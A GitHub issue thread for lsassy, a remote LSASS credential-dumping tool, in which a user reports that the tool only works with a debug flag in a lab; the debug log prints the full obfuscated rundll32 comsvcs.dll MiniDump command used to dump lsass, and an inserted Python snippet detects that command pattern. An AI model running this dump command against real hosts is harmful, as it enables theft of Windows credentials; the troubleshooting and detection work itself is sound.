login-securite / lsassy

Extract credentials from lsass remotely
https://en.hackndo.com/remote-lsass-dump-passwords/
MIT License

Working with `debug` but not without it. #94

Open n3rada opened 4 months ago

n3rada commented 4 months ago

I just got a strange behavior here. I have set up one pivot and I am running this command from my attacker machine:

lsassy -d 'final.com' -u 'Administrator' -H '8388d0760....' 172.16.207.187 -vv -debug
[*] MainThread lsassy v 3.1.9
[*] [Core] Targets: ['172.16.207.187']
[*] [Core] Created target: 1: 172.16.207.187
[*] 172.16.207.187 smb_session: <impacket.smbconnection.SMBConnection object at 0x7fe16afd9650>
[x] 172.16.207.187 Connection error
Traceback (most recent call last):
  File "/home/kali/.local/pipx/venvs/lsassy/lib/python3.11/site-packages/impacket/smbconnection.py", line 278, in login
    return self._SMBConnection.login(user, password, domain, lmhash, nthash)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/.local/pipx/venvs/lsassy/lib/python3.11/site-packages/impacket/smb3.py", line 1006, in login
    if packet.isValidAnswer(STATUS_SUCCESS):
       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/.local/pipx/venvs/lsassy/lib/python3.11/site-packages/impacket/smb3structs.py", line 458, in isValidAnswer
    raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/kali/.local/pipx/venvs/lsassy/lib/python3.11/site-packages/lsassy/session.py", line 53, in get_session
    self.smb_session.login(username, password, domain, lmhash, nthash)
  File "/home/kali/.local/pipx/venvs/lsassy/lib/python3.11/site-packages/impacket/smbconnection.py", line 280, in login
    raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[!] 172.16.207.187 Couldn't connect to remote host
[*] 172.16.207.187 Cleaning...
[*] 172.16.207.187 dumper: None
[*] 172.16.207.187 file: None
[*] 172.16.207.187 session: <lsassy.session.Session object at 0x7fe16a3f5310>
[*] 172.16.207.187 Potential issue while cleaning dumper: 'NoneType' object has no attribute 'clean'
[*] 172.16.207.187 Potential issue while closing file: 'NoneType' object has no attribute 'close'
[*] 172.16.207.187 Couldn't delete lsass dump using file. Trying dump object...
[*] 172.16.207.187 Potential issue while deleting lsass dump: 'NoneType' object has no attribute 'dump_path'
[*] 172.16.207.187 Potential issue while closing SMB session: 'NoneType' object has no attribute 'close'

But with -debug it works...

lsassy -d 'final.com' -u 'Administrator' -H '8388d0760....' 172.16.207.187 -vv -debug
[*] MainThread lsassy v 3.1.9
[*] [Core] Targets: ['172.16.207.187']
[*] [Core] Created target: 1: 172.16.207.187
[*] 172.16.207.187 smb_session: <impacket.smbconnection.SMBConnection object at 0x7f2d69e36f10>
[*] 172.16.207.187 SMB session opened
[*] 172.16.207.187 Connecting to C$
[*] 172.16.207.187 Authentication successful
[*] 172.16.207.187 Dumping via lsassy.dumpmethod.comsvcs
[*] 172.16.207.187 Exec method: <lsassy.exec.smb.Exec object at 0x7f2d69c83710>
[*] 172.16.207.187 Exec method: <lsassy.exec.wmi.Exec object at 0x7f2d69c3cbd0>
[*] 172.16.207.187 Exec method: <lsassy.exec.task.Exec object at 0x7f2d46ea8b90>
[*] 172.16.207.187 Exec method: <lsassy.exec.mmc.Exec object at 0x7f2d46ee6c10>
[*] 172.16.207.187 Exec Methods: {'smb': <lsassy.exec.smb.Exec object at 0x7f2d69c83710>, 'wmi': <lsassy.exec.wmi.Exec object at 0x7f2d69c3cbd0>, 'task': <lsassy.exec.task.Exec object at 0x7f2d46ea8b90>, 'mmc': <lsassy.exec.mmc.Exec object at 0x7f2d46ee6c10>}
[*] 172.16.207.187 Trying smb method
[*] 172.16.207.187 Building command - Exec Method has seDebugPrivilege: True | seDebugPrivilege needed: True | Powershell allowed: True | Copy executor: False
[*] 172.16.207.187 ['for /f "tokens=1,2 delims= " ^%A in (\'"tasklist /fi "Imagename eq lsass.exe" | find "lsass""\') do rundll32.exe C:\\windows\\System32\\comsvcs.dll, #+0000^24 ^%B \\Windows\\Temp\\lZ2tWb35F.vsv full']
[*] 172.16.207.187 Transformed command: CMd.eXe /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, #+0000^24 ^%B \Windows\Temp\lZ2tWb35F.vsv full
[*] 172.16.207.187 Executing using lsassy.exec.smb
[*] 172.16.207.187 StringBinding ncacn_np:172.16.207.187[\pipe\svcctl]
[*] 172.16.207.187 Service JIjOseGv created
[*] 172.16.207.187 Service JIjOseGv deleted
[*] 172.16.207.187 /Windows/Temp//lZ2tWb35F.vsv handle acquired
[*] 172.16.207.187 Lsass dumped in C:\Windows\Temp\lZ2tWb35F.vsv (47628591 Bytes)
[*] 172.16.207.187 File C$/Windows/Temp//lZ2tWb35F.vsv deleted
[*] 172.16.207.187 Lsass dump deleted

I've cut off the end so as not to reveal the hashes. I don't know if you'll be able to do anything about this one @Hackndo, but I'd love to get your take on it.
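From the defender's side, the useful artefact in the successful run above is the transformed command lsassy prints: `rundll32.exe C:\windows\System32\comsvcs.dll, #+0000^24 ...`, where cmd.exe strips the caret and rundll32 resolves `#+000024` to ordinal 24, the MiniDump export of comsvcs.dll. The check below is an added example (not part of this issue or of lsassy's code) that normalizes such a process-creation command line and flags the comsvcs.dll MiniDump call whether it is named or given as an obfuscated ordinal; the sample command lines are constructed.

```python
import re

# Constructed sample command lines as a process-creation log would record them.
# The first mirrors the "Transformed command" line shown in the issue above.
SAMPLE_CMDLINES = [
    r'''CMd.eXe /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, #+0000^24 ^%B \Windows\Temp\lZ2tWb35F.vsv full''',
    r'rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 652 C:\Temp\out.dmp full',
    r'rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL hotplug.dll',
]

RUNDLL32_RE = re.compile(
    r'rundll32(?:\.exe)?\s+(?P<dll>\S+?)\s*,\s*(?P<entry>\S+)', re.IGNORECASE)


def cmd_unescape(cmdline: str) -> str:
    """Undo cmd.exe caret escaping ('^x' -> 'x'), so '#+0000^24' becomes '#+000024'."""
    return re.sub(r'\^(.)', r'\1', cmdline)


def resolve_entry(entry: str):
    """Classify a rundll32 entry point: ('ordinal', n) for '#<n>' forms, which rundll32
    accepts with an optional '+' and leading zeros, otherwise ('name', entry)."""
    if entry.startswith('#'):
        m = re.fullmatch(r'[+]?0*(\d+)', entry[1:])
        return ('ordinal', int(m.group(1)) if m else None)
    return ('name', entry)


def is_comsvcs_minidump(cmdline: str) -> bool:
    """True when rundll32 targets comsvcs.dll's MiniDump export, by name or by ordinal 24."""
    m = RUNDLL32_RE.search(cmd_unescape(cmdline))
    if not m:
        return False
    dll = m.group('dll').rsplit('\\', 1)[-1].lower()
    if dll != 'comsvcs.dll':
        return False
    kind, value = resolve_entry(m.group('entry'))
    return (kind == 'ordinal' and value == 24) or (kind == 'name' and value.lower() == 'minidump')


def flag_cmdlines(cmdlines):
    """Return the subset of command lines that match the comsvcs.dll MiniDump pattern."""
    return [c for c in cmdlines if is_comsvcs_minidump(c)]


if __name__ == '__main__':
    for hit in flag_cmdlines(SAMPLE_CMDLINES):
        print('ALERT comsvcs.dll MiniDump via rundll32:', hit[:80])
```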

Hackndo commented 4 months ago

That's a weird behavior indeed... I shall try and find out what's causing this... Is it a steady behavior?

n3rada commented 4 months ago

Regular on this machine from this lab. I don't usually have any problems. That's why I'm opening this issue, so that if one day you see the same behaviour, you can be sure that it might not be as isolated as you think.

But for the time being ... 🤷‍♂️